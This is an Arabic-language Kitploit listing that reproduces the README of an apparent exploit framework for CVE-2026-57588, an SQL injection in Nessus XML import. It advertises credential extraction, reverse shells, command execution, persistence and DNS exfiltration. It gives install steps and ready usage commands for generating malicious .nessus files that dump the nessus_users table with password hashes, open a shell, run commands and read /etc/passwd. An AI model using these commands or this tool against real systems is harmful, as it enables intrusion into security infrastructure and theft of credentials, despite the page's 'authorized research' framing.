Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — إثبات مفهوم (PoC) لثغرة CVE-2026-57588 - حقن SQL في استيراد XML في Nessus 10.12.0. ينشئ ملفات .nessus خبيثة لتعداد قواعد البيانات، واستخراج بيانات الاعتماد، واختبار الحقن الأعمى القائم على الوقت. مخصص للبحث الأمني المصرح به. المؤلف: Sudeepa Wanigarathna. تم إصلاح الثغرة في الإصدار 10.12.1. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
أمن قواعد البيانات
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

عرض المستودع
117منذ 2 أشهرلم تتم المراجعة بعد

حول

إثبات مفهوم (PoC) لثغرة CVE-2026-57588 - حقن SQL في استيراد XML في Nessus 10.12.0. ينشئ ملفات .nessus خبيثة لتعداد قواعد البيانات، واستخراج بيانات الاعتماد، واختبار الحقن الأعمى القائم على الوقت. مخصص للبحث الأمني المصرح به. المؤلف: Sudeepa Wanigarathna. تم إصلاح الثغرة في الإصدار 10.12.1.

مشاركة

🛡️ CVE-2026-57588 - إطار عمل استغلال حقن SQL في Nessus

Security Research CVE Version Python License


📋 جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • بدء سريع
  • أمثلة الاستخدام
  • أنواع الحمولات
  • سيناريوهات متقدمة
  • إعداد التقارير
  • استكشاف الأخطاء وإصلاحها
  • اعتبارات أمنية
  • الترخيص

🔍 نظرة عامة

CVE-2026-57588 هي ثغرة حقن SQL حرجة تم اكتشافها في إصدارات Tenable Nessus 10.12.0 والإصدارات الأقدم. تكمن الثغرة في آلية تحليل XML عند استيراد ملفات نتائج الفحص .nessus، مما يسمح للمستخدمين المُصادَق عليهم الحاصلين على صلاحيات الاستيراد بتنفيذ استعلامات SQL عشوائية ضد قاعدة بيانات PostgreSQL الخلفية.


⚠️ تفاصيل الثغرة

الخاصيةالقيمة
معرّف CVECVE-2026-57588
نوع الثغرةحقن SQL
المنتجات المتأثرةTenable Nessus 10.12.0 والإصدارات الأقدم
الإصدار المُصحَّحNessus 10.12.1 والإصدارات الأحدث
درجة CVSS4.3 (متوسطة)
ناقل الهجومالشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةمصادقة (صلاحيات الاستيراد)
تفاعل المستخدممطلوب (هندسة اجتماعية)
الأثرتسريب البيانات، تنفيذ أوامر عن بُعد (RCE)

🔬 التفاصيل الفنية

توجد الثغرة بسبب عدم كفاية تعقيم قيم وسوم XML قبل دمجها في استعلامات SQL أثناء عملية الاستيراد. يمكن للمهاجم إنشاء ملف .nessus يحتوي على حمولات حقن SQL مصممة خصيصًا داخل وسوم XML مثل:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

عندما يستورد مستخدم بصلاحيات مرتفعة الملف الخبيث، يتم تنفيذ القيم غير المعقَّمة ضد قاعدة بيانات PostgreSQL الخلفية، مما يتيح:

  • تعداد قاعدة البيانات
  • تسريب البيانات
  • تنفيذ الأوامر
  • الوصول إلى نظام الملفات
  • تثبيت الاستمرارية

✨ الميزات

اضغط لتوسيع قائمة الميزات

🎯 إدارة الحمولات

  • أكثر من 13 نوعًا من الحمولات مصنفة حسب الغرض
  • توليد الحمولات القائم على القوالب
  • إنشاء الحمولات المخصصة والتحقق منها
  • التحقق من المعاملات وفحص الصياغة
  • التحقق من صياغة SQL

🚀 قدرات الاستغلال

  • استغلال متعدد المراحل مع تنفيذ متوازٍ
  • بصمة قاعدة البيانات والتعداد
  • تسريب البيانات مع اختيار مخصص للجداول/الأعمدة
  • تنفيذ الأوامر على النظام المستهدف
  • الوصول إلى نظام الملفات وقراءتها
  • شل عكسي مع جلسة تفاعلية
  • آليات تثبيت الاستمرارية
  • حقن SQL أعمى قائم على الوقت
  • حقن SQL أعمى قائم على القيم المنطقية
  • حقن SQL قائم على الأخطاء
  • استعلامات متراصة للاستغلال المتقدم
  • تسريب DNS خارج النطاق

📊 التقارير والتسجيل

  • تقارير HTML بتنسيق احترافي
  • تقارير Markdown للتوثيق
  • تقارير JSON للأتمتة
  • تقارير نصية للمراجعة السريعة
  • تدوير السجلات بمستويات متعددة
  • إحصائيات تنفيذ مفصلة
  • تجزئة الملفات للتحقق من السلامة

🛠️ ميزات متقدمة

  • تنفيذ متوازٍ مع مهام قابلة للضبط
  • دعم البروكسي للعمليات السرية
  • التعامل مع شهادات SSL/TLS
  • التحقق من XML وفحص المخطط
  • وضع تفاعلي للاستغلال المباشر
  • آلية إعادة المحاولة لتحقيق الموثوقية
  • إعداد المهلة الزمنية للاتصالات البطيئة

📦 أدوات احترافية

  • هيكل واجهة أوامر قائم على الأوامر الفرعية
  • وضعا التفصيلي والصامت
  • مخرجات طرفية ملونة
  • مؤشرات تقدم للمهام الطويلة
  • دعم Docker للاختبار في حاويات
  • توافق عبر المنصات (Linux, Windows, macOS)

📦 التثبيت

🐍 المتطلبات الأساسية

  • Python 3.7 أو أحدث
  • pip (مدير حزم Python)
  • Git (اختياري، للاستنساخ)

🔧 التثبيت السريع

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Create and activate virtual environment
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

🐳 التثبيت عبر Docker

# Build the Docker image
docker build -t nessus-exploit .

# Run the tool
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 التثبيت كحزمة

# Install as a package
pip install -e .

# Now you can run from anywhere
nessus-exploit generate -u https://test.com -p enum

🚀 بدء سريع

الاستخدام الأساسي

# Generate a basic enumeration exploit
python3 exploit.py generate -u https://test.com -p enum

# Generate advanced multi-stage exploit
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Extract data from database
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

مساعدة الأوامر

# Show general help
python3 exploit.py --help

# Show generate command help
python3 exploit.py generate --help

# List all available payloads
python3 exploit.py list

💡 أمثلة الاستخدام

1. التعداد الأساسي

python3 exploit.py generate -u https://test.com -p enum
المخرجات المتوقعة
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s

============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================

2. استغلال متقدم متعدد المراحل

python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. تسريب البيانات

# Extract user credentials
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Extract with custom columns
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. الشل العكسي

# Start listener and generate exploit
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus

5. تنفيذ الأوامر

# Execute basic commands
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"

# Execute complex commands
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"

6. قراءة الملفات

# Read system files
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd

# Read application logs
python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log

7. الحقن الأعمى القائم على الوقت

# 5-second delay
python3 exploit.py generate -u https://test.com -p sleep -s 5

# 30-second delay for heavy tests
python3 exploit.py generate -u https://test.com -p sleep -s 30

8. مع دعم البروكسي

تنزيل الأداة